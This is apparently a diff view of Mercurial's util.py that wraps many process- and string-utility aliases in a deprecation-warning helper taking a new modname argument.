        octet = ord(readexactly(fh, 1))
        value |= (octet & 0x7f) << shift
        if not (octet & 0x80):
            return value
        shift += 7
3770
3770
3771 ###
3771 ###
3772 # Deprecation warnings for util.py splitting
3772 # Deprecation warnings for util.py splitting
3773 ###
3773 ###
3774
3774
3775 def _deprecatedfunc(func, version):
3775 def _deprecatedfunc(func, version, modname=None):
3776 def wrapped(*args, **kwargs):
3776 def wrapped(*args, **kwargs):
3777 fn = pycompat.sysbytes(func.__name__)
3777 fn = pycompat.sysbytes(func.__name__)
3778 mn = pycompat.sysbytes(func.__module__)[len('mercurial.'):]
3778 mn = modname or pycompat.sysbytes(func.__module__)[len('mercurial.'):]
3779 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
3779 msg = "'util.%s' is deprecated, use '%s.%s'" % (fn, mn, fn)
3780 nouideprecwarn(msg, version)
3780 nouideprecwarn(msg, version)
3781 return func(*args, **kwargs)
3781 return func(*args, **kwargs)
3782 wrapped.__name__ = func.__name__
3782 wrapped.__name__ = func.__name__
3783 return wrapped
3783 return wrapped
3784
3784
3785 defaultdateformats = dateutil.defaultdateformats
3785 defaultdateformats = dateutil.defaultdateformats
3786 extendeddateformats = dateutil.extendeddateformats
3786 extendeddateformats = dateutil.extendeddateformats
3787 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
3787 makedate = _deprecatedfunc(dateutil.makedate, '4.6')
3788 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
3788 datestr = _deprecatedfunc(dateutil.datestr, '4.6')
3789 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
3789 shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
3790 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
3790 parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
3791 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
3791 strdate = _deprecatedfunc(dateutil.strdate, '4.6')
3792 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
3792 parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
3793 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
3793 matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')
3794
3794
3795 stderr = procutil.stderr
3795 stderr = procutil.stderr
3796 stdin = procutil.stdin
3796 stdin = procutil.stdin
3797 stdout = procutil.stdout
3797 stdout = procutil.stdout
3798 explainexit = procutil.explainexit
3798 explainexit = _deprecatedfunc(procutil.explainexit, '4.6',
3799 findexe = procutil.findexe
3799 modname='utils.procutil')
3800 getuser = procutil.getuser
3800 findexe = _deprecatedfunc(procutil.findexe, '4.6', modname='utils.procutil')
3801 getpid = procutil.getpid
3801 getuser = _deprecatedfunc(procutil.getuser, '4.6', modname='utils.procutil')
3802 hidewindow = procutil.hidewindow
3802 getpid = _deprecatedfunc(procutil.getpid, '4.6', modname='utils.procutil')
3803 popen = procutil.popen
3803 hidewindow = _deprecatedfunc(procutil.hidewindow, '4.6',
3804 quotecommand = procutil.quotecommand
3804 modname='utils.procutil')
3805 readpipe = procutil.readpipe
3805 popen = _deprecatedfunc(procutil.popen, '4.6', modname='utils.procutil')
3806 setbinary = procutil.setbinary
3806 quotecommand = _deprecatedfunc(procutil.quotecommand, '4.6',
3807 setsignalhandler = procutil.setsignalhandler
3807 modname='utils.procutil')
3808 shellquote = procutil.shellquote
3808 readpipe = _deprecatedfunc(procutil.readpipe, '4.6', modname='utils.procutil')
3809 shellsplit = procutil.shellsplit
3809 setbinary = _deprecatedfunc(procutil.setbinary, '4.6', modname='utils.procutil')
3810 spawndetached = procutil.spawndetached
3810 setsignalhandler = _deprecatedfunc(procutil.setsignalhandler, '4.6',
3811 sshargs = procutil.sshargs
3811 modname='utils.procutil')
3812 testpid = procutil.testpid
3812 shellquote = _deprecatedfunc(procutil.shellquote, '4.6',
3813 modname='utils.procutil')
3814 shellsplit = _deprecatedfunc(procutil.shellsplit, '4.6',
3815 modname='utils.procutil')
3816 spawndetached = _deprecatedfunc(procutil.spawndetached, '4.6',
3817 modname='utils.procutil')
3818 sshargs = _deprecatedfunc(procutil.sshargs, '4.6', modname='utils.procutil')
3819 testpid = _deprecatedfunc(procutil.testpid, '4.6', modname='utils.procutil')
3813 try:
3820 try:
3814 setprocname = procutil.setprocname
3821 setprocname = _deprecatedfunc(procutil.setprocname, '4.6',
3822 modname='utils.procutil')
3815 except AttributeError:
3823 except AttributeError:
3816 pass
3824 pass
3817 try:
3825 try:
3818 unblocksignal = procutil.unblocksignal
3826 unblocksignal = _deprecatedfunc(procutil.unblocksignal, '4.6',
3827 modname='utils.procutil')
3819 except AttributeError:
3828 except AttributeError:
3820 pass
3829 pass
3821 closefds = procutil.closefds
3830 closefds = procutil.closefds
3822 isatty = procutil.isatty
3831 isatty = _deprecatedfunc(procutil.isatty, '4.6')
3823 popen2 = procutil.popen2
3832 popen2 = _deprecatedfunc(procutil.popen2, '4.6')
3824 popen3 = procutil.popen3
3833 popen3 = _deprecatedfunc(procutil.popen3, '4.6')
3825 popen4 = procutil.popen4
3834 popen4 = _deprecatedfunc(procutil.popen4, '4.6')
3826 pipefilter = procutil.pipefilter
3835 pipefilter = _deprecatedfunc(procutil.pipefilter, '4.6')
3827 tempfilter = procutil.tempfilter
3836 tempfilter = _deprecatedfunc(procutil.tempfilter, '4.6')
3828 filter = procutil.filter
3837 filter = _deprecatedfunc(procutil.filter, '4.6')
3829 mainfrozen = procutil.mainfrozen
3838 mainfrozen = _deprecatedfunc(procutil.mainfrozen, '4.6')
3830 hgexecutable = procutil.hgexecutable
3839 hgexecutable = _deprecatedfunc(procutil.hgexecutable, '4.6')
3831 isstdin = procutil.isstdin
3840 isstdin = _deprecatedfunc(procutil.isstdin, '4.6')
3832 isstdout = procutil.isstdout
3841 isstdout = _deprecatedfunc(procutil.isstdout, '4.6')
3833 shellenviron = procutil.shellenviron
3842 shellenviron = _deprecatedfunc(procutil.shellenviron, '4.6')
3834 system = procutil.system
3843 system = _deprecatedfunc(procutil.system, '4.6')
3835 gui = procutil.gui
3844 gui = _deprecatedfunc(procutil.gui, '4.6')
3836 hgcmd = procutil.hgcmd
3845 hgcmd = _deprecatedfunc(procutil.hgcmd, '4.6')
3837 rundetached = procutil.rundetached
3846 rundetached = _deprecatedfunc(procutil.rundetached, '4.6')
3838
3847
3839 escapedata = _deprecatedfunc(stringutil.escapedata, '4.6')
3848 escapedata = _deprecatedfunc(stringutil.escapedata, '4.6')
3840 binary = _deprecatedfunc(stringutil.binary, '4.6')
3849 binary = _deprecatedfunc(stringutil.binary, '4.6')
3841 stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
3850 stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
3842 shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
3851 shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
3843 emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
3852 emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
3844 email = _deprecatedfunc(stringutil.email, '4.6')
3853 email = _deprecatedfunc(stringutil.email, '4.6')
3845 ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
3854 ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
3846 escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
3855 escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
3847 unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
3856 unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
3848 forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
3857 forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
3849 uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
3858 uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
3850 wrap = _deprecatedfunc(stringutil.wrap, '4.6')
3859 wrap = _deprecatedfunc(stringutil.wrap, '4.6')
3851 parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
3860 parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
General Comments 0
You need to be logged in to leave comments. Login now